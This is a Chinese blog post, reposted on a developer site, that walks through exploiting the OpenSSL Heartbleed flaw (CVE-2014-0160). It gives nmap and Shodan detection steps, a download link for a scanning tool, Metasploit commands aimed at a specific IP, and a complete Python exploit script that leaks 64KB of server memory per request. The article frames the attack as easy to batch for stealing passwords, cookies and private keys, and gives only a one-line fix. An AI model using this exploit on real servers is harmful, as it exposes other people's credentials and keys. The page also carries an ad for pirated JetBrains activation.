心脏出血漏洞利用「建议收藏」

心脏出血漏洞利用「建议收藏」0x0引言~心脏出血(英语:Heartbleed),也简称为心血漏洞,是一个出现在加密程序库OpenSSL的安全漏洞,该程序库广泛用于实现互联网的传输层安全(TLS)协议。它于2012年被引入了软件中,2014年4月首次向公众披露。只要使用的是存在缺陷的OpenSSL实例,无论是服务器还是客户端,都可能因此而受到攻击。此问题的原因是在实现TLS的心跳扩展时没有对输入进行适当验证(缺少边界检查),…

大家好,又见面了,我是你们的朋友全栈君。

0x0引言~

心脏出血(英语:Heartbleed),也简称为心血漏洞,是一个出现在加密程序库OpenSSL的安全漏洞,该程序库广泛用于实现互联网的传输层安全(TLS)协议。它于2012年被引入了软件中,2014年4月首次向公众披露。只要使用的是存在缺陷的OpenSSL实例,无论是服务器还是客户端,都可能因此而受到攻击。此问题的原因是在实现TLS的心跳扩展时没有对输入进行适当验证(缺少边界检查),因此漏洞的名称来源于“心跳”(heartbeat)。该程序错误属于缓冲区过读,即可以读取的数据比应该允许读取的还多。


文章目录


一、漏洞详情

一、漏洞描述

在OpenSSL1.0.1版本中存在严重漏洞(CVE-2014-0160),此次漏洞问题存在于ssl/dl_both.c文件中。OpenSSL Heartbleed模块存在一个BUG,当攻击者构造一个特殊的数据包,满足用户心跳包中无法提供足够多的数据会导致memcpy把SSLv3记录之后的数据直接输出,该漏洞导致攻击者可以远程读取存在漏洞版本的openssl服务器内存中64K的数据,该漏洞主要存在与OpenSSL的1.0.1版本到1.0.1f版本

二、漏洞范围

该漏洞主要存在于OpenSSL以下版本:
1.OpenSSL 1.0.2-beta
2.OpenSSL 1.0.1 – OpenSSL 1.0.1f

三、漏洞成因

Heartbleed漏洞,这项严重缺陷(CVE-2014-0160)的产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露

四、漏洞危害

该漏洞具有随机性,攻击者可通过该漏洞读取网络服务器内存中的敏感数据信息(每次利用该漏洞可读取目标的64K敏感信息),只要有足够的耐心和时间,就可以翻检足够多的数据,拼凑出户主的银行密码、私信等敏感数据,利用该漏洞可以获取到服务器的私钥,用户cookie和账号密码等


漏洞探测

一、nmap探测

nmap.exe -sV -p443 --script ssl-heartbleed.nse -v ip/域名

通过nmap反馈结果可以看出目标存在心脏滴血漏洞
在这里插入图片描述


二、专属工具探测(推荐)

工具传送门:https://pan.baidu.com/s/11Y7A7USLlS9l_dxsrHvbcg
提取码:jcaz

在这里插入图片描述


三、搜索引擎探测

可利用shodan进行全网探测

openssl/1.0.1a

在这里插入图片描述


实战利用

一、msf利用

1.命令行输入 search openssl 查看关于openssl的漏洞模块

root@kali:~# msfconsole
msf5 > search openssl

在这里插入图片描述
可以看到有auxiliary(辅助)模块和exploit(攻击)模块,而我们现在要使用的是模块4,用来进行对Heartbleed的漏洞利用

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > show options 

在这里插入图片描述

需要设置的options:

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts ip
rhosts => 37.18.75.111
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 端口
rport => 443
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true 
verbose => true
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > exploit 

每次exploit 可获取64K信息,只要有足够的耐心和时间,就可以翻检足够多的数据,拼凑出用户的各类信息,虽然此漏洞存在随机性,但是实现方法简易快捷,可批量攻击,故存在较高的危险性

在这里插入图片描述


二、EXP利用

完整的exp:

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', type='string', default='', help='STARTTLS protocol: smtp, pop3, imap, ftp, or xmpp')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''')
hb = h2bin(''' 18 03 02 00 03 01 40 00 ''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=4):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
BUFSIZ = 1024
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
s.connect((args[0], opts.port))
if opts.starttls != '':
print 'Sending STARTTLS Protocol Command...'
if opts.starttls == 'smtp':
s.recv(BUFSIZ)
s.send("EHLO openssl.client.net\n")
s.recv(BUFSIZ)
s.send("STARTTLS\n")
s.recv(BUFSIZ)
if opts.starttls == 'pop3':
s.recv(BUFSIZ)
s.send("STLS\n")
s.recv(BUFSIZ)
if opts.starttls == 'imap':
s.recv(BUFSIZ)
s.send("STARTTLS\n")
s.recv(BUFSIZ)
if opts.starttls == 'ftp':
s.recv(BUFSIZ)
s.send("AUTH TLS\n")
s.recv(BUFSIZ)
if opts.starttls == 'xmpp': # TODO: This needs SASL
s.send("<stream:stream xmlns:stream='http://etherx.jabber.org/streams' xmlns='jabber:client' to='%s' version='1.0'\n")
s.recv(BUFSIZ)
print 'Sending Client Hello...'
s.send(hello)
print 'Waiting for Server Hello...'
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()

exp利用方式:python+exp.py+ip/域名

注:每次使用exp可获取64k敏感数据
在这里插入图片描述


修补方案

要解决此漏洞,建议服务器管理员或使用1.0.1g版,或使用-DOPENSSL_NO_HEARTBEATS选项重新编译OpenSSL,从而禁用易受攻击的功能,直至可以更新服务器软件

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/160523.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • uniapp下载apk并且安装(uniapp打包后apk白屏)

    本文使用cli方式一、Android原生配置官方文档0安装开发环境必备软件:AndroidStudioHBuilderX小程序Android离线sdk,下载版本sdk(一般是最新版。版本要与HBuilderX版本一致,检查版本的方法看下面导出App资源小节)申请Appkey登录开发者中心。如果没有账号,就注册一个。申请Appkey需要进行邮箱和手机号的实名认证。在左侧菜单中选择我创建的应用,点击应用左侧选择离线打包Key管理,选择对应平台iOSAndroid

  • 宋宝华: 纪念金庸先生——程序员的武侠世界

    在漫天的星河中,有这样一颗星,他朴实无华,却又熠熠生辉,照亮了无数人的人生。他就是金庸先生。随着一代大侠的驾鹤西去,“飞雪连天射白鹿,笑书神侠倚碧鸳”,成为绝响。 每一个…

  • windows10添加开机启动项怎么设置_注册表添加开机启动项

    windows10添加开机启动项怎么设置_注册表添加开机启动项在日常生活中,偶尔要求其中的软件在开机时便能自动启动,比如MySQL一般被设置为自启动项。今天将为大家介绍window10中如何添加开机启动项。操作过程:1、按下win+R调出运行窗口,并输入“shell:startup”即可进入开机启动文件夹。2、开机启动文件夹如图所示,此时文件夹中内容为空。3、如果想要添加启动项,可以将软件快捷方式移入开机启动文件夹中,比如移入“福昕阅读器”。4、我们可以在任务管理器中查看是否成功添加开机启动项…

    2022年10月26日
  • 单例模式 java 三种写法_双重锁的单例模式

    单例模式 java 三种写法_双重锁的单例模式单例模式有多种写法,都有各自的优缺点,最常见的优缺点就是【懒汉和饿汉】的比较,以及是否线程安全懒汉模式,节约内存,只有使用到时才创建单例对象,可能会有线程安全问题饿汉模式,浪费内存,但可以由JVM类加载器去保证线程安全一、饿汉模式publicclassSingleton1{/***饿汉式提前创建好单例对象(在类被主动使用时便会触发静态变量的初始化)*/privatefinalstaticSingleton1INSTANCE=new

  • Oracle常用操作

    Oracle常用操作

  • kafka介绍和使用[通俗易懂]

    kafka介绍和使用[通俗易懂]1.1.      主要功能根据官网的介绍,ApacheKafka®是一个分布式流媒体平台,它主要有3种功能:  1:Itletsyoupublishandsubscribetostreamsofrecords.发布和订阅消息流,这个功能类似于消息队列,这也是kafka归类为消息队列框架的原因  2:Itletsyoustorestreamsofrecordsin…

    2022年10月13日

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号